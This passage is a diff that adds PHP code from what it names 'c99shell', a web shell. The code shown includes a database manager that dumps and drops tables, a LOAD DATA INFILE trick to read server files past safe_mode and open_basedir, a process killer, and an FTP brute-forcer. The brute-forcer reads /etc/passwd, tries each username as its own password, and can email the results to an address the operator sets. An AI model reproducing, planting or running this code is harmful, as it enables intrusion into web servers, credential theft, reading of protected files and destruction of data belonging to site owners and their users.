+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>�</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
